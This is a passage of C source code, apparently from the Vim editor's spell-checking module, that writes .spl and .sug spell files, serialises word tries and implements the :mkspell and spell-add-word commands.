ftp = &((fromto_T *)gap->ga_data)[i];
for (rr = 1; rr <= 2; ++rr)
{
p = rr == 1 ? ftp->ft_from : ftp->ft_to;
l = (int)STRLEN(p);
putc(l, fd);
if (l > 0)
fwv &= fwrite(p, l, (size_t)1, fd);
}
}
}
/* SN_SOFO: <sofofromlen> <sofofrom> <sofotolen> <sofoto>
* This is for making suggestions, section is not required. */
if (spin->si_sofofr != NULL && spin->si_sofoto != NULL)
{
putc(SN_SOFO, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
l = (int)STRLEN(spin->si_sofofr);
put_bytes(fd, (long_u)(l + STRLEN(spin->si_sofoto) + 4), 4);
/* <sectionlen> */
put_bytes(fd, (long_u)l, 2); /* <sofofromlen> */
fwv &= fwrite(spin->si_sofofr, l, (size_t)1, fd); /* <sofofrom> */
l = (int)STRLEN(spin->si_sofoto);
put_bytes(fd, (long_u)l, 2); /* <sofotolen> */
fwv &= fwrite(spin->si_sofoto, l, (size_t)1, fd); /* <sofoto> */
}
/* SN_WORDS: <word> ...
* This is for making suggestions, section is not required. */
if (spin->si_commonwords.ht_used > 0)
{
putc(SN_WORDS, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
/* round 1: count the bytes
* round 2: write the bytes */
for (round = 1; round <= 2; ++round)
{
int todo;
int len = 0;
hashitem_T *hi;
todo = (int)spin->si_commonwords.ht_used;
for (hi = spin->si_commonwords.ht_array; todo > 0; ++hi)
if (!HASHITEM_EMPTY(hi))
{
l = (int)STRLEN(hi->hi_key) + 1;
len += l;
if (round == 2) /* <word> */
fwv &= fwrite(hi->hi_key, (size_t)l, (size_t)1, fd);
--todo;
}
if (round == 1)
put_bytes(fd, (long_u)len, 4); /* <sectionlen> */
}
}
/* SN_MAP: <mapstr>
* This is for making suggestions, section is not required. */
if (spin->si_map.ga_len > 0)
{
putc(SN_MAP, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
l = spin->si_map.ga_len;
put_bytes(fd, (long_u)l, 4); /* <sectionlen> */
fwv &= fwrite(spin->si_map.ga_data, (size_t)l, (size_t)1, fd);
/* <mapstr> */
}
/* SN_SUGFILE: <timestamp>
* This is used to notify that a .sug file may be available and at the
* same time allows for checking that a .sug file that is found matches
* with this .spl file. That's because the word numbers must be exactly
* right. */
if (!spin->si_nosugfile
&& (spin->si_sal.ga_len > 0
|| (spin->si_sofofr != NULL && spin->si_sofoto != NULL)))
{
putc(SN_SUGFILE, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
put_bytes(fd, (long_u)8, 4); /* <sectionlen> */
/* Set si_sugtime and write it to the file. */
spin->si_sugtime = time(NULL);
put_time(fd, spin->si_sugtime); /* <timestamp> */
}
/* SN_NOSPLITSUGS: nothing
* This is used to notify that no suggestions with word splits are to be
* made. */
if (spin->si_nosplitsugs)
{
putc(SN_NOSPLITSUGS, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
put_bytes(fd, (long_u)0, 4); /* <sectionlen> */
}
/* SN_NOCOMPUNDSUGS: nothing
* This is used to notify that no suggestions with compounds are to be
* made. */
if (spin->si_nocompoundsugs)
{
putc(SN_NOCOMPOUNDSUGS, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
put_bytes(fd, (long_u)0, 4); /* <sectionlen> */
}
/* SN_COMPOUND: compound info.
* We don't mark it required, when not supported all compound words will
* be bad words. */
if (spin->si_compflags != NULL)
{
putc(SN_COMPOUND, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
l = (int)STRLEN(spin->si_compflags);
for (i = 0; i < spin->si_comppat.ga_len; ++i)
l += (int)STRLEN(((char_u **)(spin->si_comppat.ga_data))[i]) + 1;
put_bytes(fd, (long_u)(l + 7), 4); /* <sectionlen> */
putc(spin->si_compmax, fd); /* <compmax> */
putc(spin->si_compminlen, fd); /* <compminlen> */
putc(spin->si_compsylmax, fd); /* <compsylmax> */
putc(0, fd); /* for Vim 7.0b compatibility */
putc(spin->si_compoptions, fd); /* <compoptions> */
put_bytes(fd, (long_u)spin->si_comppat.ga_len, 2);
/* <comppatcount> */
for (i = 0; i < spin->si_comppat.ga_len; ++i)
{
p = ((char_u **)(spin->si_comppat.ga_data))[i];
putc((int)STRLEN(p), fd); /* <comppatlen> */
fwv &= fwrite(p, (size_t)STRLEN(p), (size_t)1, fd);
/* <comppattext> */
}
/* <compflags> */
fwv &= fwrite(spin->si_compflags, (size_t)STRLEN(spin->si_compflags),
(size_t)1, fd);
}
/* SN_NOBREAK: NOBREAK flag */
if (spin->si_nobreak)
{
putc(SN_NOBREAK, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
/* It's empty, the presence of the section flags the feature. */
put_bytes(fd, (long_u)0, 4); /* <sectionlen> */
}
/* SN_SYLLABLE: syllable info.
* We don't mark it required, when not supported syllables will not be
* counted. */
if (spin->si_syllable != NULL)
{
putc(SN_SYLLABLE, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
l = (int)STRLEN(spin->si_syllable);
put_bytes(fd, (long_u)l, 4); /* <sectionlen> */
fwv &= fwrite(spin->si_syllable, (size_t)l, (size_t)1, fd);
/* <syllable> */
}
/* end of <SECTIONS> */
putc(SN_END, fd); /* <sectionend> */
/*
* <LWORDTREE> <KWORDTREE> <PREFIXTREE>
*/
spin->si_memtot = 0;
for (round = 1; round <= 3; ++round)
{
if (round == 1)
tree = spin->si_foldroot->wn_sibling;
else if (round == 2)
tree = spin->si_keeproot->wn_sibling;
else
tree = spin->si_prefroot->wn_sibling;
/* Clear the index and wnode fields in the tree. */
clear_node(tree);
/* Count the number of nodes. Needed to be able to allocate the
* memory when reading the nodes. Also fills in index for shared
* nodes. */
nodecount = put_node(NULL, tree, 0, regionmask, round == 3);
/* number of nodes in 4 bytes */
put_bytes(fd, (long_u)nodecount, 4); /* <nodecount> */
spin->si_memtot += nodecount + nodecount * sizeof(int);
/* Write the nodes. */
(void)put_node(fd, tree, 0, regionmask, round == 3);
}
/* Write another byte to check for errors (file system full). */
if (putc(0, fd) == EOF)
retval = FAIL;
theend:
if (fclose(fd) == EOF)
retval = FAIL;
if (fwv != (size_t)1)
retval = FAIL;
if (retval == FAIL)
EMSG(_(e_write));
return retval;
}
/*
* Clear the index and wnode fields of "node", it siblings and its
* children. This is needed because they are a union with other items to save
* space.
*/
static void
clear_node(wordnode_T *node)
{
wordnode_T *np;
if (node != NULL)
for (np = node; np != NULL; np = np->wn_sibling)
{
np->wn_u1.index = 0;
np->wn_u2.wnode = NULL;
if (np->wn_byte != NUL)
clear_node(np->wn_child);
}
}
/*
* Dump a word tree at node "node".
*
* This first writes the list of possible bytes (siblings). Then for each
* byte recursively write the children.
*
* NOTE: The code here must match the code in read_tree_node(), since
* assumptions are made about the indexes (so that we don't have to write them
* in the file).
*
* Returns the number of nodes used.
*/
static int
put_node(
FILE *fd, /* NULL when only counting */
wordnode_T *node,
int idx,
int regionmask,
int prefixtree) /* TRUE for PREFIXTREE */
{
int newindex = idx;
int siblingcount = 0;
wordnode_T *np;
int flags;
/* If "node" is zero the tree is empty. */
if (node == NULL)
return 0;
/* Store the index where this node is written. */
node->wn_u1.index = idx;
/* Count the number of siblings. */
for (np = node; np != NULL; np = np->wn_sibling)
++siblingcount;
/* Write the sibling count. */
if (fd != NULL)
putc(siblingcount, fd); /* <siblingcount> */
/* Write each sibling byte and optionally extra info. */
for (np = node; np != NULL; np = np->wn_sibling)
{
if (np->wn_byte == 0)
{
if (fd != NULL)
{
/* For a NUL byte (end of word) write the flags etc. */
if (prefixtree)
{
/* In PREFIXTREE write the required affixID and the
* associated condition nr (stored in wn_region). The
* byte value is misused to store the "rare" and "not
* combining" flags */
if (np->wn_flags == (short_u)PFX_FLAGS)
putc(BY_NOFLAGS, fd); /* <byte> */
else
{
putc(BY_FLAGS, fd); /* <byte> */
putc(np->wn_flags, fd); /* <pflags> */
}
putc(np->wn_affixID, fd); /* <affixID> */
put_bytes(fd, (long_u)np->wn_region, 2); /* <prefcondnr> */
}
else
{
/* For word trees we write the flag/region items. */
flags = np->wn_flags;
if (regionmask != 0 && np->wn_region != regionmask)
flags |= WF_REGION;
if (np->wn_affixID != 0)
flags |= WF_AFX;
if (flags == 0)
{
/* word without flags or region */
putc(BY_NOFLAGS, fd); /* <byte> */
}
else
{
if (np->wn_flags >= 0x100)
{
putc(BY_FLAGS2, fd); /* <byte> */
putc(flags, fd); /* <flags> */
putc((unsigned)flags >> 8, fd); /* <flags2> */
}
else
{
putc(BY_FLAGS, fd); /* <byte> */
putc(flags, fd); /* <flags> */
}
if (flags & WF_REGION)
putc(np->wn_region, fd); /* <region> */
if (flags & WF_AFX)
putc(np->wn_affixID, fd); /* <affixID> */
}
}
}
}
else
{
if (np->wn_child->wn_u1.index != 0
&& np->wn_child->wn_u2.wnode != node)
{
/* The child is written elsewhere, write the reference. */
if (fd != NULL)
{
putc(BY_INDEX, fd); /* <byte> */
/* <nodeidx> */
put_bytes(fd, (long_u)np->wn_child->wn_u1.index, 3);
}
}
else if (np->wn_child->wn_u2.wnode == NULL)
/* We will write the child below and give it an index. */
np->wn_child->wn_u2.wnode = node;
if (fd != NULL)
if (putc(np->wn_byte, fd) == EOF) /* <byte> or <xbyte> */
{
EMSG(_(e_write));
return 0;
}
}
}
/* Space used in the array when reading: one for each sibling and one for
* the count. */
newindex += siblingcount + 1;
/* Recursively dump the children of each sibling. */
for (np = node; np != NULL; np = np->wn_sibling)
if (np->wn_byte != 0 && np->wn_child->wn_u2.wnode == node)
newindex = put_node(fd, np->wn_child, newindex, regionmask,
prefixtree);
return newindex;
}
/*
* ":mkspell [-ascii] outfile infile ..."
* ":mkspell [-ascii] addfile"
*/
void
ex_mkspell(exarg_T *eap)
{
int fcount;
char_u **fnames;
char_u *arg = eap->arg;
int ascii = FALSE;
if (STRNCMP(arg, "-ascii", 6) == 0)
{
ascii = TRUE;
arg = skipwhite(arg + 6);
}
/* Expand all the remaining arguments (e.g., $VIMRUNTIME). */
if (get_arglist_exp(arg, &fcount, &fnames, FALSE) == OK)
{
mkspell(fcount, fnames, ascii, eap->forceit, FALSE);
FreeWild(fcount, fnames);
}
}
/*
* Create the .sug file.
* Uses the soundfold info in "spin".
* Writes the file with the name "wfname", with ".spl" changed to ".sug".
*/
static void
spell_make_sugfile(spellinfo_T *spin, char_u *wfname)
{
char_u *fname = NULL;
int len;
slang_T *slang;
int free_slang = FALSE;
/*
* Read back the .spl file that was written. This fills the required
* info for soundfolding. This also uses less memory than the
* pointer-linked version of the trie. And it avoids having two versions
* of the code for the soundfolding stuff.
* It might have been done already by spell_reload_one().
*/
for (slang = first_lang; slang != NULL; slang = slang->sl_next)
if (fullpathcmp(wfname, slang->sl_fname, FALSE) == FPC_SAME)
break;
if (slang == NULL)
{
spell_message(spin, (char_u *)_("Reading back spell file..."));
slang = spell_load_file(wfname, NULL, NULL, FALSE);
if (slang == NULL)
return;
free_slang = TRUE;
}
/*
* Clear the info in "spin" that is used.
*/
spin->si_blocks = NULL;
spin->si_blocks_cnt = 0;
spin->si_compress_cnt = 0; /* will stay at 0 all the time*/
spin->si_free_count = 0;
spin->si_first_free = NULL;
spin->si_foldwcount = 0;
/*
* Go through the trie of good words, soundfold each word and add it to
* the soundfold trie.
*/
spell_message(spin, (char_u *)_("Performing soundfolding..."));
if (sug_filltree(spin, slang) == FAIL)
goto theend;
/*
* Create the table which links each soundfold word with a list of the
* good words it may come from. Creates buffer "spin->si_spellbuf".
* This also removes the wordnr from the NUL byte entries to make
* compression possible.
*/
if (sug_maketable(spin) == FAIL)
goto theend;
smsg((char_u *)_("Number of words after soundfolding: %ld"),
(long)spin->si_spellbuf->b_ml.ml_line_count);
/*
* Compress the soundfold trie.
*/
spell_message(spin, (char_u *)_(msg_compressing));
wordtree_compress(spin, spin->si_foldroot);
/*
* Write the .sug file.
* Make the file name by changing ".spl" to ".sug".
*/
fname = alloc(MAXPATHL);
if (fname == NULL)
goto theend;
vim_strncpy(fname, wfname, MAXPATHL - 1);
len = (int)STRLEN(fname);
fname[len - 2] = 'u';
fname[len - 1] = 'g';
sug_write(spin, fname);
theend:
vim_free(fname);
if (free_slang)
slang_free(slang);
free_blocks(spin->si_blocks);
close_spellbuf(spin->si_spellbuf);
}
/*
* Build the soundfold trie for language "slang".
*/
static int
sug_filltree(spellinfo_T *spin, slang_T *slang)
{
char_u *byts;
idx_T *idxs;
int depth;
idx_T arridx[MAXWLEN];
int curi[MAXWLEN];
char_u tword[MAXWLEN];
char_u tsalword[MAXWLEN];
int c;
idx_T n;
unsigned words_done = 0;
int wordcount[MAXWLEN];
/* We use si_foldroot for the soundfolded trie. */
spin->si_foldroot = wordtree_alloc(spin);
if (spin->si_foldroot == NULL)
return FAIL;
/* let tree_add_word() know we're adding to the soundfolded tree */
spin->si_sugtree = TRUE;
/*
* Go through the whole case-folded tree, soundfold each word and put it
* in the trie.
*/
byts = slang->sl_fbyts;
idxs = slang->sl_fidxs;
arridx[0] = 0;
curi[0] = 1;
wordcount[0] = 0;
depth = 0;
while (depth >= 0 && !got_int)
{
if (curi[depth] > byts[arridx[depth]])
{
/* Done all bytes at this node, go up one level. */
idxs[arridx[depth]] = wordcount[depth];
if (depth > 0)
wordcount[depth - 1] += wordcount[depth];
--depth;
line_breakcheck();
}
else
{
/* Do one more byte at this node. */
n = arridx[depth] + curi[depth];
++curi[depth];
c = byts[n];
if (c == 0)
{
/* Sound-fold the word. */
tword[depth] = NUL;
spell_soundfold(slang, tword, TRUE, tsalword);
/* We use the "flags" field for the MSB of the wordnr,
* "region" for the LSB of the wordnr. */
if (tree_add_word(spin, tsalword, spin->si_foldroot,
words_done >> 16, words_done & 0xffff,
0) == FAIL)
return FAIL;
++words_done;
++wordcount[depth];
/* Reset the block count each time to avoid compression
* kicking in. */
spin->si_blocks_cnt = 0;
/* Skip over any other NUL bytes (same word with different
* flags). */
while (byts[n + 1] == 0)
{
++n;
++curi[depth];
}
}
else
{
/* Normal char, go one level deeper. */
tword[depth++] = c;
arridx[depth] = idxs[n];
curi[depth] = 1;
wordcount[depth] = 0;
}
}
}
smsg((char_u *)_("Total number of words: %d"), words_done);
return OK;
}
/*
* Make the table that links each word in the soundfold trie to the words it
* can be produced from.
* This is not unlike lines in a file, thus use a memfile to be able to access
* the table efficiently.
* Returns FAIL when out of memory.
*/
static int
sug_maketable(spellinfo_T *spin)
{
garray_T ga;
int res = OK;
/* Allocate a buffer, open a memline for it and create the swap file
* (uses a temp file, not a .swp file). */
spin->si_spellbuf = open_spellbuf();
if (spin->si_spellbuf == NULL)
return FAIL;
/* Use a buffer to store the line info, avoids allocating many small
* pieces of memory. */
ga_init2(&ga, 1, 100);
/* recursively go through the tree */
if (sug_filltable(spin, spin->si_foldroot->wn_sibling, 0, &ga) == -1)
res = FAIL;
ga_clear(&ga);
return res;
}
/*
* Fill the table for one node and its children.
* Returns the wordnr at the start of the node.
* Returns -1 when out of memory.
*/
static int
sug_filltable(
spellinfo_T *spin,
wordnode_T *node,
int startwordnr,
garray_T *gap) /* place to store line of numbers */
{
wordnode_T *p, *np;
int wordnr = startwordnr;
int nr;
int prev_nr;
for (p = node; p != NULL; p = p->wn_sibling)
{
if (p->wn_byte == NUL)
{
gap->ga_len = 0;
prev_nr = 0;
for (np = p; np != NULL && np->wn_byte == NUL; np = np->wn_sibling)
{
if (ga_grow(gap, 10) == FAIL)
return -1;
nr = (np->wn_flags << 16) + (np->wn_region & 0xffff);
/* Compute the offset from the previous nr and store the
* offset in a way that it takes a minimum number of bytes.
* It's a bit like utf-8, but without the need to mark
* following bytes. */
nr -= prev_nr;
prev_nr += nr;
gap->ga_len += offset2bytes(nr,
(char_u *)gap->ga_data + gap->ga_len);
}
/* add the NUL byte */
((char_u *)gap->ga_data)[gap->ga_len++] = NUL;
if (ml_append_buf(spin->si_spellbuf, (linenr_T)wordnr,
gap->ga_data, gap->ga_len, TRUE) == FAIL)
return -1;
++wordnr;
/* Remove extra NUL entries, we no longer need them. We don't
* bother freeing the nodes, the won't be reused anyway. */
while (p->wn_sibling != NULL && p->wn_sibling->wn_byte == NUL)
p->wn_sibling = p->wn_sibling->wn_sibling;
/* Clear the flags on the remaining NUL node, so that compression
* works a lot better. */
p->wn_flags = 0;
p->wn_region = 0;
}
else
{
wordnr = sug_filltable(spin, p->wn_child, wordnr, gap);
if (wordnr == -1)
return -1;
}
}
return wordnr;
}
/*
* Convert an offset into a minimal number of bytes.
* Similar to utf_char2byters, but use 8 bits in followup bytes and avoid NUL
* bytes.
*/
static int
offset2bytes(int nr, char_u *buf)
{
int rem;
int b1, b2, b3, b4;
/* Split the number in parts of base 255. We need to avoid NUL bytes. */
b1 = nr % 255 + 1;
rem = nr / 255;
b2 = rem % 255 + 1;
rem = rem / 255;
b3 = rem % 255 + 1;
b4 = rem / 255 + 1;
if (b4 > 1 || b3 > 0x1f) /* 4 bytes */
{
buf[0] = 0xe0 + b4;
buf[1] = b3;
buf[2] = b2;
buf[3] = b1;
return 4;
}
if (b3 > 1 || b2 > 0x3f ) /* 3 bytes */
{
buf[0] = 0xc0 + b3;
buf[1] = b2;
buf[2] = b1;
return 3;
}
if (b2 > 1 || b1 > 0x7f ) /* 2 bytes */
{
buf[0] = 0x80 + b2;
buf[1] = b1;
return 2;
}
/* 1 byte */
buf[0] = b1;
return 1;
}
/*
* Write the .sug file in "fname".
*/
static void
sug_write(spellinfo_T *spin, char_u *fname)
{
FILE *fd;
wordnode_T *tree;
int nodecount;
int wcount;
char_u *line;
linenr_T lnum;
int len;
/* Create the file. Note that an existing file is silently overwritten! */
fd = mch_fopen((char *)fname, "w");
if (fd == NULL)
{
EMSG2(_(e_notopen), fname);
return;
}
vim_snprintf((char *)IObuff, IOSIZE,
_("Writing suggestion file %s ..."), fname);
spell_message(spin, IObuff);
/*
* <SUGHEADER>: <fileID> <versionnr> <timestamp>
*/
if (fwrite(VIMSUGMAGIC, VIMSUGMAGICL, (size_t)1, fd) != 1) /* <fileID> */
{
EMSG(_(e_write));
goto theend;
}
putc(VIMSUGVERSION, fd); /* <versionnr> */
/* Write si_sugtime to the file. */
put_time(fd, spin->si_sugtime); /* <timestamp> */
/*
* <SUGWORDTREE>
*/
spin->si_memtot = 0;
tree = spin->si_foldroot->wn_sibling;
/* Clear the index and wnode fields in the tree. */
clear_node(tree);
/* Count the number of nodes. Needed to be able to allocate the
* memory when reading the nodes. Also fills in index for shared
* nodes. */
nodecount = put_node(NULL, tree, 0, 0, FALSE);
/* number of nodes in 4 bytes */
put_bytes(fd, (long_u)nodecount, 4); /* <nodecount> */
spin->si_memtot += nodecount + nodecount * sizeof(int);
/* Write the nodes. */
(void)put_node(fd, tree, 0, 0, FALSE);
/*
* <SUGTABLE>: <sugwcount> <sugline> ...
*/
wcount = spin->si_spellbuf->b_ml.ml_line_count;
put_bytes(fd, (long_u)wcount, 4); /* <sugwcount> */
for (lnum = 1; lnum <= (linenr_T)wcount; ++lnum)
{
/* <sugline>: <sugnr> ... NUL */
line = ml_get_buf(spin->si_spellbuf, lnum, FALSE);
len = (int)STRLEN(line) + 1;
if (fwrite(line, (size_t)len, (size_t)1, fd) == 0)
{
EMSG(_(e_write));
goto theend;
}
spin->si_memtot += len;
}
/* Write another byte to check for errors. */
if (putc(0, fd) == EOF)
EMSG(_(e_write));
vim_snprintf((char *)IObuff, IOSIZE,
_("Estimated runtime memory use: %d bytes"), spin->si_memtot);
spell_message(spin, IObuff);
theend:
/* close the file */
fclose(fd);
}
/*
* Create a Vim spell file from one or more word lists.
* "fnames[0]" is the output file name.
* "fnames[fcount - 1]" is the last input file name.
* Exception: when "fnames[0]" ends in ".add" it's used as the input file name
* and ".spl" is appended to make the output file name.
*/
void
mkspell(
int fcount,
char_u **fnames,
int ascii, /* -ascii argument given */
int over_write, /* overwrite existing output file */
int added_word) /* invoked through "zg" */
{
char_u *fname = NULL;
char_u *wfname;
char_u **innames;
int incount;
afffile_T *(afile[8]);
int i;
int len;
stat_T st;
int error = FALSE;
spellinfo_T spin;
vim_memset(&spin, 0, sizeof(spin));
spin.si_verbose = !added_word;
spin.si_ascii = ascii;
spin.si_followup = TRUE;
spin.si_rem_accents = TRUE;
ga_init2(&spin.si_rep, (int)sizeof(fromto_T), 20);
ga_init2(&spin.si_repsal, (int)sizeof(fromto_T), 20);
ga_init2(&spin.si_sal, (int)sizeof(fromto_T), 20);
ga_init2(&spin.si_map, (int)sizeof(char_u), 100);
ga_init2(&spin.si_comppat, (int)sizeof(char_u *), 20);
ga_init2(&spin.si_prefcond, (int)sizeof(char_u *), 50);
hash_init(&spin.si_commonwords);
spin.si_newcompID = 127; /* start compound ID at first maximum */
/* default: fnames[0] is output file, following are input files */
innames = &fnames[1];
incount = fcount - 1;
wfname = alloc(MAXPATHL);
if (wfname == NULL)
return;
if (fcount >= 1)
{
len = (int)STRLEN(fnames[0]);
if (fcount == 1 && len > 4 && STRCMP(fnames[0] + len - 4, ".add") == 0)
{
/* For ":mkspell path/en.latin1.add" output file is
* "path/en.latin1.add.spl". */
innames = &fnames[0];
incount = 1;
vim_snprintf((char *)wfname, MAXPATHL, "%s.spl", fnames[0]);
}
else if (fcount == 1)
{
/* For ":mkspell path/vim" output file is "path/vim.latin1.spl". */
innames = &fnames[0];
incount = 1;
vim_snprintf((char *)wfname, MAXPATHL, SPL_FNAME_TMPL,
fnames[0], spin.si_ascii ? (char_u *)"ascii" : spell_enc());
}
else if (len > 4 && STRCMP(fnames[0] + len - 4, ".spl") == 0)
{
/* Name ends in ".spl", use as the file name. */
vim_strncpy(wfname, fnames[0], MAXPATHL - 1);
}
else
/* Name should be language, make the file name from it. */
vim_snprintf((char *)wfname, MAXPATHL, SPL_FNAME_TMPL,
fnames[0], spin.si_ascii ? (char_u *)"ascii" : spell_enc());
/* Check for .ascii.spl. */
if (strstr((char *)gettail(wfname), SPL_FNAME_ASCII) != NULL)
spin.si_ascii = TRUE;
/* Check for .add.spl. */
if (strstr((char *)gettail(wfname), SPL_FNAME_ADD) != NULL)
spin.si_add = TRUE;
}
if (incount <= 0)
EMSG(_(e_invarg)); /* need at least output and input names */
else if (vim_strchr(gettail(wfname), '_') != NULL)
EMSG(_("E751: Output file name must not have region name"));
else if (incount > 8)
EMSG(_("E754: Only up to 8 regions supported"));
else
{
/* Check for overwriting before doing things that may take a lot of
* time. */
if (!over_write && mch_stat((char *)wfname, &st) >= 0)
{
EMSG(_(e_exists));
goto theend;
}
if (mch_isdir(wfname))
{
EMSG2(_(e_isadir2), wfname);
goto theend;
}
fname = alloc(MAXPATHL);
if (fname == NULL)
goto theend;
/*
* Init the aff and dic pointers.
* Get the region names if there are more than 2 arguments.
*/
for (i = 0; i < incount; ++i)
{
afile[i] = NULL;
if (incount > 1)
{
len = (int)STRLEN(innames[i]);
if (STRLEN(gettail(innames[i])) < 5
|| innames[i][len - 3] != '_')
{
EMSG2(_("E755: Invalid region in %s"), innames[i]);
goto theend;
}
spin.si_region_name[i * 2] = TOLOWER_ASC(innames[i][len - 2]);
spin.si_region_name[i * 2 + 1] =
TOLOWER_ASC(innames[i][len - 1]);
}
}
spin.si_region_count = incount;
spin.si_foldroot = wordtree_alloc(&spin);
spin.si_keeproot = wordtree_alloc(&spin);
spin.si_prefroot = wordtree_alloc(&spin);
if (spin.si_foldroot == NULL
|| spin.si_keeproot == NULL
|| spin.si_prefroot == NULL)
{
free_blocks(spin.si_blocks);
goto theend;
}
/* When not producing a .add.spl file clear the character table when
* we encounter one in the .aff file. This means we dump the current
* one in the .spl file if the .aff file doesn't define one. That's
* better than guessing the contents, the table will match a
* previously loaded spell file. */
if (!spin.si_add)
spin.si_clear_chartab = TRUE;
/*
* Read all the .aff and .dic files.
* Text is converted to 'encoding'.
* Words are stored in the case-folded and keep-case trees.
*/
for (i = 0; i < incount && !error; ++i)
{
spin.si_conv.vc_type = CONV_NONE;
spin.si_region = 1 << i;
vim_snprintf((char *)fname, MAXPATHL, "%s.aff", innames[i]);
if (mch_stat((char *)fname, &st) >= 0)
{
/* Read the .aff file. Will init "spin->si_conv" based on the
* "SET" line. */
afile[i] = spell_read_aff(&spin, fname);
if (afile[i] == NULL)
error = TRUE;
else
{
/* Read the .dic file and store the words in the trees. */
vim_snprintf((char *)fname, MAXPATHL, "%s.dic",
innames[i]);
if (spell_read_dic(&spin, fname, afile[i]) == FAIL)
error = TRUE;
}
}
else
{
/* No .aff file, try reading the file as a word list. Store
* the words in the trees. */
if (spell_read_wordfile(&spin, innames[i]) == FAIL)
error = TRUE;
}
#ifdef FEAT_MBYTE
/* Free any conversion stuff. */
convert_setup(&spin.si_conv, NULL, NULL);
#endif
}
if (spin.si_compflags != NULL && spin.si_nobreak)
MSG(_("Warning: both compounding and NOBREAK specified"));
if (!error && !got_int)
{
/*
* Combine tails in the tree.
*/
spell_message(&spin, (char_u *)_(msg_compressing));
wordtree_compress(&spin, spin.si_foldroot);
wordtree_compress(&spin, spin.si_keeproot);
wordtree_compress(&spin, spin.si_prefroot);
}
if (!error && !got_int)
{
/*
* Write the info in the spell file.
*/
vim_snprintf((char *)IObuff, IOSIZE,
_("Writing spell file %s ..."), wfname);
spell_message(&spin, IObuff);
error = write_vim_spell(&spin, wfname) == FAIL;
spell_message(&spin, (char_u *)_("Done!"));
vim_snprintf((char *)IObuff, IOSIZE,
_("Estimated runtime memory use: %d bytes"), spin.si_memtot);
spell_message(&spin, IObuff);
/*
* If the file is loaded need to reload it.
*/
if (!error)
spell_reload_one(wfname, added_word);
}
/* Free the allocated memory. */
ga_clear(&spin.si_rep);
ga_clear(&spin.si_repsal);
ga_clear(&spin.si_sal);
ga_clear(&spin.si_map);
ga_clear(&spin.si_comppat);
ga_clear(&spin.si_prefcond);
hash_clear_all(&spin.si_commonwords, 0);
/* Free the .aff file structures. */
for (i = 0; i < incount; ++i)
if (afile[i] != NULL)
spell_free_aff(afile[i]);
/* Free all the bits and pieces at once. */
free_blocks(spin.si_blocks);
/*
* If there is soundfolding info and no NOSUGFILE item create the
* .sug file with the soundfolded word trie.
*/
if (spin.si_sugtime != 0 && !error && !got_int)
spell_make_sugfile(&spin, wfname);
}
theend:
vim_free(fname);
vim_free(wfname);
}
/*
* Display a message for spell file processing when 'verbose' is set or using
* ":mkspell". "str" can be IObuff.
*/
static void
spell_message(spellinfo_T *spin, char_u *str)
{
if (spin->si_verbose || p_verbose > 2)
{
if (!spin->si_verbose)
verbose_enter();
MSG(str);
out_flush();
if (!spin->si_verbose)
verbose_leave();
}
}
/*
* ":[count]spellgood {word}"
* ":[count]spellwrong {word}"
* ":[count]spellundo {word}"
*/
void
ex_spell(exarg_T *eap)
{
spell_add_word(eap->arg, (int)STRLEN(eap->arg), eap->cmdidx == CMD_spellwrong,
eap->forceit ? 0 : (int)eap->line2,
eap->cmdidx == CMD_spellundo);
}
/*
* Add "word[len]" to 'spellfile' as a good or bad word.
*/
void
spell_add_word(
char_u *word,
int len,
int bad,
int idx, /* "zG" and "zW": zero, otherwise index in
'spellfile' */
int undo) /* TRUE for "zug", "zuG", "zuw" and "zuW" */
{
FILE *fd = NULL;
buf_T *buf = NULL;
int new_spf = FALSE;
char_u *fname;
char_u *fnamebuf = NULL;
char_u line[MAXWLEN * 2];
long fpos, fpos_next = 0;
int i;
char_u *spf;
if (idx == 0) /* use internal wordlist */
{
if (int_wordlist == NULL)
{
int_wordlist = vim_tempname('s', FALSE);
if (int_wordlist == NULL)
return;
}
fname = int_wordlist;
}
else
{
/* If 'spellfile' isn't set figure out a good default value. */
if (*curwin->w_s->b_p_spf == NUL)
{
init_spellfile();
new_spf = TRUE;
}
if (*curwin->w_s->b_p_spf == NUL)
{
EMSG2(_(e_notset), "spellfile");
return;
}
fnamebuf = alloc(MAXPATHL);
if (fnamebuf == NULL)
return;
for (spf = curwin->w_s->b_p_spf, i = 1; *spf != NUL; ++i)
{
copy_option_part(&spf, fnamebuf, MAXPATHL, ",");
if (i == idx)
break;
if (*spf == NUL)
{
EMSGN(_("E765: 'spellfile' does not have %ld entries"), idx);
vim_free(fnamebuf);
return;
}
}
/* Check that the user isn't editing the .add file somewhere. */
buf = buflist_findname_exp(fnamebuf);
if (buf != NULL && buf->b_ml.ml_mfp == NULL)
buf = NULL;
if (buf != NULL && bufIsChanged(buf))
{
EMSG(_(e_bufloaded));
vim_free(fnamebuf);
return;
}
fname = fnamebuf;
}
if (bad || undo)
{
/* When the word appears as good word we need to remove that one,
* since its flags sort before the one with WF_BANNED. */
fd = mch_fopen((char *)fname, "r");
if (fd != NULL)
{
while (!vim_fgets(line, MAXWLEN * 2, fd))
{
fpos = fpos_next;
fpos_next = ftell(fd);
if (STRNCMP(word, line, len) == 0
&& (line[len] == '/' || line[len] < ' '))
{
/* Found duplicate word. Remove it by writing a '#' at
* the start of the line. Mixing reading and writing
* doesn't work for all systems, close the file first. */
fclose(fd);
fd = mch_fopen((char *)fname, "r+");
if (fd == NULL)
break;
if (fseek(fd, fpos, SEEK_SET) == 0)
{
fputc('#', fd);
if (undo)
{
home_replace(NULL, fname, NameBuff, MAXPATHL, TRUE);
smsg((char_u *)_("Word '%.*s' removed from %s"),
len, word, NameBuff);
}
}
fseek(fd, fpos_next, SEEK_SET);
}
}
if (fd != NULL)
fclose(fd);
}
}
if (!undo)
{
fd = mch_fopen((char *)fname, "a");
if (fd == NULL && new_spf)
{
char_u *p;
/* We just initialized the 'spellfile' option and can't open the
* file. We may need to create the "spell" directory first. We
* already checked the runtime directory is writable in
* init_spellfile(). */
if (!dir_of_file_exists(fname) && (p = gettail_sep(fname)) != fname)
{
int c = *p;
/* The directory doesn't exist. Try creating it and opening
* the file again. */
*p = NUL;
vim_mkdir(fname, 0755);
*p = c;
